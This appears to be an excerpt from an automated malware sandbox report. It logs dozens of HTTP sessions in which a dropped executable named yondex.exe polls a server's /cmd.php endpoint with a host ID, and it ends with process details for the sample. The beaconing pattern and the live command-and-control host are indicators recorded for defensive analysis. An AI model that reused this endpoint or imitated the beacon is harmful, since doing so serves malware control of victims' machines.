                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 1
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=2a3a1f444c786762b7ebdc0a58c25320; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache
                                                                              2024-06-23 09:34:25 UTC1INData Raw: 31
                                                                              Data Ascii: 1


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              123192.168.2.44986792.53.96.1214438064C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-06-23 09:34:26 UTC172OUTGET /cmd.php?hwid=B81A4609 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              Connection: Keep-Alive
                                                                              2024-06-23 09:34:27 UTC357INHTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:34:27 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 0
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=cee663817d4543b7e91366c7a47f01f0; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              124192.168.2.44986892.53.96.1214438064C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-06-23 09:34:27 UTC144OUTGET /cmd.php?timeout=1 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              2024-06-23 09:34:28 UTC357INHTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:34:28 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 1
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=d20ad4ea73d9af2b4db81a9141d2f648; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache
                                                                              2024-06-23 09:34:28 UTC1INData Raw: 31
                                                                              Data Ascii: 1


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              125192.168.2.44986992.53.96.1214438064C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-06-23 09:34:30 UTC172OUTGET /cmd.php?hwid=B81A4609 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              Connection: Keep-Alive
                                                                              2024-06-23 09:34:30 UTC357INHTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:34:30 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 0
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=e842312572562a43ac595fab0ffa31b0; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              126192.168.2.44987092.53.96.1214438064C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-06-23 09:34:31 UTC144OUTGET /cmd.php?timeout=1 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              2024-06-23 09:34:31 UTC357INHTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:34:31 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 1
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=4c3346c97ea1ffa92890a8bfaf9aaaf9; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache
                                                                              2024-06-23 09:34:31 UTC1INData Raw: 31
                                                                              Data Ascii: 1


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              127192.168.2.44987192.53.96.1214438064C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-06-23 09:34:33 UTC172OUTGET /cmd.php?hwid=B81A4609 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              Connection: Keep-Alive
                                                                              2024-06-23 09:34:33 UTC357INHTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:34:33 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 0
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=4d9c4549176287e452d454fdc5e074ff; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              128192.168.2.44987292.53.96.1214438064C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-06-23 09:34:34 UTC144OUTGET /cmd.php?timeout=1 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              2024-06-23 09:34:34 UTC357INHTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:34:34 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 1
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=c72cc42470a6f248c7b34324bc283f47; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache
                                                                              2024-06-23 09:34:34 UTC1INData Raw: 31
                                                                              Data Ascii: 1


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              129192.168.2.44987392.53.96.1214438064C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-06-23 09:34:35 UTC172OUTGET /cmd.php?hwid=B81A4609 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              Connection: Keep-Alive
                                                                              2024-06-23 09:34:36 UTC357INHTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:34:36 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 0
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=bc6eeafc781b36ad3d2598e6f73176e4; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              130192.168.2.44987492.53.96.1214438064C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-06-23 09:34:37 UTC144OUTGET /cmd.php?timeout=1 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              2024-06-23 09:34:37 UTC357INHTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:34:37 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 1
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=b804a33d8dac627dc87f9b83cba92e71; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache
                                                                              2024-06-23 09:34:37 UTC1INData Raw: 31
                                                                              Data Ascii: 1


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              131192.168.2.44987592.53.96.1214438064C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-06-23 09:34:39 UTC172OUTGET /cmd.php?hwid=B81A4609 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              Connection: Keep-Alive
                                                                              2024-06-23 09:34:39 UTC357INHTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:34:39 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 0
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=39f8a823c95e1d6b93f07183d0152294; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              132192.168.2.44987692.53.96.1214438064C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-06-23 09:34:40 UTC144OUTGET /cmd.php?timeout=1 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              2024-06-23 09:34:40 UTC357INHTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:34:40 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 1
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=5a8d42da7a32277ea202bfe20cdcefd5; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache
                                                                              2024-06-23 09:34:40 UTC1INData Raw: 31
                                                                              Data Ascii: 1


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              133192.168.2.44987792.53.96.1214438064C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-06-23 09:34:43 UTC172OUTGET /cmd.php?hwid=B81A4609 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              Connection: Keep-Alive
                                                                              2024-06-23 09:34:43 UTC357INHTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:34:43 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 0
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=1fd1326eb7ab8cee316cb07cc7f21133; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              134192.168.2.44987892.53.96.1214438064C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-06-23 09:34:44 UTC144OUTGET /cmd.php?timeout=1 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              2024-06-23 09:34:44 UTC357INHTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:34:44 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 1
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=2dd95ae5d63ba471b99ea578fd807716; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache
                                                                              2024-06-23 09:34:44 UTC1INData Raw: 31
                                                                              Data Ascii: 1


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              135192.168.2.44987992.53.96.1214438064C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-06-23 09:34:46 UTC172OUTGET /cmd.php?hwid=B81A4609 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              Connection: Keep-Alive
                                                                              2024-06-23 09:34:46 UTC357INHTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:34:46 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 0
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=cddd5234d3acab52460d68e4e4fb4976; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              136192.168.2.44988092.53.96.1214438064C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-06-23 09:34:47 UTC144OUTGET /cmd.php?timeout=1 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              2024-06-23 09:34:47 UTC357INHTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:34:47 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 1
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=3f411fab3e652dbd91e8a3d8a78b9df1; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache
                                                                              2024-06-23 09:34:47 UTC1INData Raw: 31
                                                                              Data Ascii: 1


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              137192.168.2.44988192.53.96.1214438064C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-06-23 09:34:49 UTC172OUTGET /cmd.php?hwid=B81A4609 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              Connection: Keep-Alive
                                                                              2024-06-23 09:34:50 UTC357INHTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:34:50 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 0
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=0b150c9657f82ff7f88a16359cd7892e; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              138192.168.2.44988292.53.96.1214438064C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-06-23 09:34:50 UTC144OUTGET /cmd.php?timeout=1 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              2024-06-23 09:34:51 UTC357INHTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:34:51 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 1
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=18449a694dc7f14830eeb24674fe7998; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache
                                                                              2024-06-23 09:34:51 UTC1INData Raw: 31
                                                                              Data Ascii: 1


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              139192.168.2.44988392.53.96.1214438064C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-06-23 09:34:52 UTC172OUTGET /cmd.php?hwid=B81A4609 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              Connection: Keep-Alive
                                                                              2024-06-23 09:34:53 UTC357INHTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:34:53 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 0
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=6cf43b83120a8178702b6c9bb5750153; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              140192.168.2.44988492.53.96.1214438064C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-06-23 09:34:53 UTC144OUTGET /cmd.php?timeout=1 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              2024-06-23 09:34:54 UTC357INHTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:34:54 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 1
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=cdebd5f4d9caed67486800f4d315d0a1; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache
                                                                              2024-06-23 09:34:54 UTC1INData Raw: 31
                                                                              Data Ascii: 1


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              141192.168.2.44988592.53.96.1214438064C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-06-23 09:34:56 UTC172OUTGET /cmd.php?hwid=B81A4609 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              Connection: Keep-Alive
                                                                              2024-06-23 09:34:56 UTC357INHTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:34:56 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 0
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=559a87f68063b4059cd4f5421e2fb6d7; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              142192.168.2.44988692.53.96.1214438064C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-06-23 09:34:57 UTC144OUTGET /cmd.php?timeout=1 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              2024-06-23 09:34:57 UTC357INHTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:34:57 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 1
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=a8a3b3574d823539aba6e00e7b49c1dc; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache
                                                                              2024-06-23 09:34:57 UTC1INData Raw: 31
                                                                              Data Ascii: 1


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              143192.168.2.44988792.53.96.1214438064C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-06-23 09:34:59 UTC172OUTGET /cmd.php?hwid=B81A4609 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              Connection: Keep-Alive
                                                                              2024-06-23 09:35:00 UTC357INHTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:34:59 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 0
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=91cfb540205b297d0cf229fa31102014; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              144192.168.2.44988892.53.96.1214438064C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-06-23 09:35:00 UTC144OUTGET /cmd.php?timeout=1 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              2024-06-23 09:35:01 UTC357INHTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:35:01 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 1
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=8d5308b0b5c44783a0588cf09870014f; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache
                                                                              2024-06-23 09:35:01 UTC1INData Raw: 31
                                                                              Data Ascii: 1


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              145192.168.2.44988992.53.96.1214438064C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-06-23 09:35:03 UTC172OUTGET /cmd.php?hwid=B81A4609 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              Connection: Keep-Alive
                                                                              2024-06-23 09:35:03 UTC357INHTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:35:03 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 0
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=1f3f1a48f4dceca08c62baf8870f24cf; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              146192.168.2.44989092.53.96.1214438064C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-06-23 09:35:04 UTC144OUTGET /cmd.php?timeout=1 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              2024-06-23 09:35:04 UTC357INHTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:35:04 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 1
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=c55db86199781635c6a56e68c1c15ba4; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache
                                                                              2024-06-23 09:35:04 UTC1INData Raw: 31
                                                                              Data Ascii: 1


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              147192.168.2.44989192.53.96.1214438064C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-06-23 09:35:07 UTC172OUTGET /cmd.php?hwid=B81A4609 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              Connection: Keep-Alive
                                                                              2024-06-23 09:35:08 UTC357INHTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:35:07 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 0
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=ae798cd535c4d6e900f56973a6c42f22; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              148192.168.2.44989292.53.96.1214438064C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-06-23 09:35:08 UTC144OUTGET /cmd.php?timeout=1 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
                                                                              Host: cv99160.tw1.ru
                                                                              2024-06-23 09:35:09 UTC357INHTTP/1.1 200 OK
                                                                              Server: nginx/1.24.0
                                                                              Date: Sun, 23 Jun 2024 09:35:08 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 1
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=a4fc576e599799f80ac617ecf9f7c91f; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache
                                                                              2024-06-23 09:35:09 UTC1INData Raw: 31
                                                                              Data Ascii: 1


                                                                              Statistics

                                                                              CPU Usage

                                                                              Click to jump to process

                                                                              Memory Usage

                                                                              Click to jump to process

                                                                              High Level Behavior Distribution

                                                                              Click to dive into process behavior distribution

                                                                              Behavior

                                                                              Click to jump to process

                                                                              System Behavior

                                                                              General

                                                                              Target ID:0
                                                                              Start time:05:31:01
                                                                              Start date:23/06/2024
                                                                              Path:C:\Users\user\Desktop\h2UFp4aCRq.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Users\user\Desktop\h2UFp4aCRq.exe"
                                                                              Imagebase:0x7ff655920000
                                                                              File size:5'061'451 bytes
                                                                              MD5 hash:1FECBC51B5620E578C48A12EBEB19BC2
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:low
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:1
                                                                              Start time:05:31:02
                                                                              Start date:23/06/2024
                                                                              Path:C:\Windows\System32\cmd.exe
                                                                              Wow64 process (32bit):false
